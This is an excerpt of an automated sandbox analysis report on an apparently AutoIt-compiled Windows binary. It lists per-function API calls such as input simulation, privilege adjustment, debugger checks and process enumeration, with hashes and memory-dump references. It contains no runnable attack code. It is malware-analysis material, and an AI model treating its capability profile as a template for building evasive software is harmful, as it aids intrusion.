                • Opcode ID: d98480166a8edc032efe8b8777df0219acc917794883b59bc620ed47954ff0a6
                • Instruction ID: 7a47543a7b0faae74f52e94f54ddc0881d76ac9c26bfef39048e55c2439dd45d
                • Opcode Fuzzy Hash: d98480166a8edc032efe8b8777df0219acc917794883b59bc620ed47954ff0a6
                • Instruction Fuzzy Hash: B451B371A00210AFDB14AF24D88AF6A77E5AB59718F08809CF9155F3D3D771AD818BE1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                • String ID:
                • API String ID: 292994002-0
                • Opcode ID: 5b911373facb34d535cb22fe76a40af8733db3a80df5fac436352c10495b0327
                • Instruction ID: 0aa802aed6a098ebadf2a670891198ee41536e5b2c67ec1eaef7c24642e07bcf
                • Opcode Fuzzy Hash: 5b911373facb34d535cb22fe76a40af8733db3a80df5fac436352c10495b0327
                • Instruction Fuzzy Hash: 4821B5397402116FD7248F2AC844B6A7BE5EF96324F198068E84ACB355C771DC42CBD4
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                • API String ID: 0-1546025612
                • Opcode ID: 2745eb558ff08ee1f0d27048bf5567d1b6a9894335e44e879bfdc08418d421aa
                • Instruction ID: 31f655dc8cbdef1ef728ab8efa3fc728ca310b1a050743ff8a8296412f439ebb
                • Opcode Fuzzy Hash: 2745eb558ff08ee1f0d27048bf5567d1b6a9894335e44e879bfdc08418d421aa
                • Instruction Fuzzy Hash: 6BA27071E0061ACBDF28CF58C8507EDB7B2BB54311F6581AAEC25AB285DB709DC5CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateToolhelp32Snapshot.KERNEL32 ref: 0019A6AC
                • Process32FirstW.KERNEL32(00000000,?), ref: 0019A6BA
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • Process32NextW.KERNEL32(00000000,?), ref: 0019A79C
                • CloseHandle.KERNEL32(00000000), ref: 0019A7AB
                  • Part of subcall function 0012CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00153303,?), ref: 0012CE8A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                • String ID:
                • API String ID: 1991900642-0
                • Opcode ID: 8d64b08e9e64f7de53d7d70b6d0050067629a405c2930ced86f86e727485e7d2
                • Instruction ID: 12560a5e519087c0b000a64637dc95d88103e6b7d5f36d71a1fc72c3a9881baf
                • Opcode Fuzzy Hash: 8d64b08e9e64f7de53d7d70b6d0050067629a405c2930ced86f86e727485e7d2
                • Instruction Fuzzy Hash: 1E519E71508300AFC714EF24D886AABBBF8FF99704F40892DF58997251EB30D944CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0017AAAC
                • SetKeyboardState.USER32(00000080), ref: 0017AAC8
                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0017AB36
                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0017AB88
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: KeyboardState$InputMessagePostSend
                • String ID:
                • API String ID: 432972143-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetReadFile.WININET(?,?,00000400,?), ref: 0018CE89
                • GetLastError.KERNEL32(?,00000000), ref: 0018CEEA
                • SetEvent.KERNEL32(?,?,00000000), ref: 0018CEFE
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorEventFileInternetLastRead
                • String ID:
                • API String ID: 234945975-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001782AA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: lstrlen
                • String ID: ($|
                • API String ID: 1659193697-1631851259
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00185CC1
                • FindNextFileW.KERNEL32(00000000,?), ref: 00185D17
                • FindClose.KERNEL32(?), ref: 00185D5F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 0014271A
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00142724
                • UnhandledExceptionFilter.KERNEL32(?), ref: 00142731
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 001851DA
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00185238
                • SetErrorMode.KERNEL32(00000000), ref: 001852A1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID:
                • API String ID: 1682464887-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0012FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00130668
                  • Part of subcall function 0012FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00130685
                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0017170D
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0017173A
                • GetLastError.KERNEL32 ref: 0017174A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                • String ID:
                • API String ID: 577356006-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0017D608
                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0017D645
                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0017D650
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseControlCreateDeviceFileHandle
                • String ID:
                • API String ID: 33631002-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0017168C
                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001716A1
                • FreeSid.ADVAPI32(?), ref: 001716B1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AllocateCheckFreeInitializeMembershipToken
                • String ID:
                • API String ID: 3429775523-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(001428E9,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002,00000000,?,001428E9), ref: 00134D09
                • TerminateProcess.KERNEL32(00000000,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002,00000000,?,001428E9), ref: 00134D10
                • ExitProcess.KERNEL32 ref: 00134D22
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: /
                • API String ID: 0-2043925204
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 0016D28C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: NameUser
                • String ID: X64
                • API String ID: 2645101109-893830106
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00186918
                • FindClose.KERNEL32(00000000), ref: 00186961
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00194891,?,?,00000035,?), ref: 001837E4
                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00194891,?,?,00000035,?), ref: 001837F4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0017B25D
                • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0017B270
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: InputSendkeybd_event
                • String ID:
                • API String ID: 3536248340-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001711FC), ref: 001710D4
                • CloseHandle.KERNEL32(?,?,001711FC), ref: 001710E9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AdjustCloseHandlePrivilegesToken
                • String ID:
                • API String ID: 81990902-0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                • Variable is not of type 'Object'., xrefs: 00160C40
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: Variable is not of type 'Object'.
                • API String ID: 0-1840281001
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00146766,?,?,00000008,?,?,0014FEFE,00000000), ref: 00146998
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • BlockInput.USER32(00000001), ref: 0018EABD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001303EE), ref: 001309DA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DeleteObject.GDI32(00000000), ref: 00192B30
                • DeleteObject.GDI32(00000000), ref: 00192B43
                • DestroyWindow.USER32 ref: 00192B52
                • GetDesktopWindow.USER32 ref: 00192B6D
                • GetWindowRect.USER32(00000000), ref: 00192B74
                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00192CA3
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00192CB1
                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192CF8
                • GetClientRect.USER32(00000000,?), ref: 00192D04
                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00192D40
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D62
                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D75
                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D80
                • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D89
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D98
                • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192DA1
                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192DA8
                • GlobalFree.KERNEL32(00000000), ref: 00192DB3
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192DC5
                • OleLoadPicture.OLEAUT32(?,00000000,00000000,001AFC38,00000000), ref: 00192DDB
                • GlobalFree.KERNEL32(00000000), ref: 00192DEB
                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00192E11
                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00192E30
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192E52
                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0019303F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                • String ID: $AutoIt v3$DISPLAY$static
                • API String ID: 2211948467-2373415609
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetTextColor.GDI32(?,00000000), ref: 001A712F
                • GetSysColorBrush.USER32(0000000F), ref: 001A7160
                • GetSysColor.USER32(0000000F), ref: 001A716C
                • SetBkColor.GDI32(?,000000FF), ref: 001A7186
                • SelectObject.GDI32(?,?), ref: 001A7195
                • InflateRect.USER32(?,000000FF,000000FF), ref: 001A71C0
                • GetSysColor.USER32(00000010), ref: 001A71C8
                • CreateSolidBrush.GDI32(00000000), ref: 001A71CF
                • FrameRect.USER32(?,?,00000000), ref: 001A71DE
                • DeleteObject.GDI32(00000000), ref: 001A71E5
                • InflateRect.USER32(?,000000FE,000000FE), ref: 001A7230
                • FillRect.USER32(?,?,?), ref: 001A7262
                • GetWindowLongW.USER32(?,000000F0), ref: 001A7284
                  • Part of subcall function 001A73E8: GetSysColor.USER32(00000012), ref: 001A7421
                  • Part of subcall function 001A73E8: SetTextColor.GDI32(?,?), ref: 001A7425
                  • Part of subcall function 001A73E8: GetSysColorBrush.USER32(0000000F), ref: 001A743B
                  • Part of subcall function 001A73E8: GetSysColor.USER32(0000000F), ref: 001A7446
                  • Part of subcall function 001A73E8: GetSysColor.USER32(00000011), ref: 001A7463
                  • Part of subcall function 001A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001A7471
                  • Part of subcall function 001A73E8: SelectObject.GDI32(?,00000000), ref: 001A7482
                  • Part of subcall function 001A73E8: SetBkColor.GDI32(?,00000000), ref: 001A748B
                  • Part of subcall function 001A73E8: SelectObject.GDI32(?,?), ref: 001A7498
                  • Part of subcall function 001A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001A74B7
                  • Part of subcall function 001A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001A74CE
                  • Part of subcall function 001A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001A74DB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                • String ID:
                • API String ID: 4124339563-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DestroyWindow.USER32(00000000), ref: 0019273E
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0019286A
                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001928A9
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001928B9
                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00192900
                • GetClientRect.USER32(00000000,?), ref: 0019290C
                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00192955
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00192964
                • GetStockObject.GDI32(00000011), ref: 00192974
                • SelectObject.GDI32(00000000,00000000), ref: 00192978
                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00192988
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00192991
                • DeleteDC.GDI32(00000000), ref: 0019299A
                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001929C6
                • SendMessageW.USER32(00000030,00000000,00000001), ref: 001929DD
                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00192A1D
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00192A31
                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00192A42
                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00192A77
                • GetStockObject.GDI32(00000011), ref: 00192A82
                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00192A8D
                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00192A97
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: 5337f2d148b2946f96f1b9ba64dc3ac41f71c3f93a4bd6b25404a8e3200db330
                • Instruction ID: 3eef70d26490da7e379c8f17a623ef64cb41f570f1ec80f5886ab3fb9a3b4cac
                • Opcode Fuzzy Hash: 5337f2d148b2946f96f1b9ba64dc3ac41f71c3f93a4bd6b25404a8e3200db330
                • Instruction Fuzzy Hash: C7B13AB5A00215BFEB14DFA8DC89FAE7BA9FB09710F004515F915EB690D774AD80CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 00184AED
                • GetDriveTypeW.KERNEL32(?,001ACB68,?,\\.\,001ACC08), ref: 00184BCA
                • SetErrorMode.KERNEL32(00000000,001ACB68,?,\\.\,001ACC08), ref: 00184D36
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$DriveType
                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                • API String ID: 2907320926-4222207086
                • Opcode ID: e11c9b2ca0870c9db24b3556c58496104bf868c9102e225e8b4da8e602eaa501
                • Instruction ID: f364981ca12a6e625bf8ae6b24481920264f88691d931daaa5a9ae4f973d5b89
                • Opcode Fuzzy Hash: e11c9b2ca0870c9db24b3556c58496104bf868c9102e225e8b4da8e602eaa501
                • Instruction Fuzzy Hash: 0561C0307056079BCB08FF64DA819A8B7B5AB15340B248026F846AB791DF76EF81DF81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSysColor.USER32(00000012), ref: 001A7421
                • SetTextColor.GDI32(?,?), ref: 001A7425
                • GetSysColorBrush.USER32(0000000F), ref: 001A743B
                • GetSysColor.USER32(0000000F), ref: 001A7446
                • CreateSolidBrush.GDI32(?), ref: 001A744B
                • GetSysColor.USER32(00000011), ref: 001A7463
                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001A7471
                • SelectObject.GDI32(?,00000000), ref: 001A7482
                • SetBkColor.GDI32(?,00000000), ref: 001A748B
                • SelectObject.GDI32(?,?), ref: 001A7498
                • InflateRect.USER32(?,000000FF,000000FF), ref: 001A74B7
                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001A74CE
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A74DB
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001A752A
                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001A7554
                • InflateRect.USER32(?,000000FD,000000FD), ref: 001A7572
                • DrawFocusRect.USER32(?,?), ref: 001A757D
                • GetSysColor.USER32(00000011), ref: 001A758E
                • SetTextColor.GDI32(?,00000000), ref: 001A7596
                • DrawTextW.USER32(?,001A70F5,000000FF,?,00000000), ref: 001A75A8
                • SelectObject.GDI32(?,?), ref: 001A75BF
                • DeleteObject.GDI32(?), ref: 001A75CA
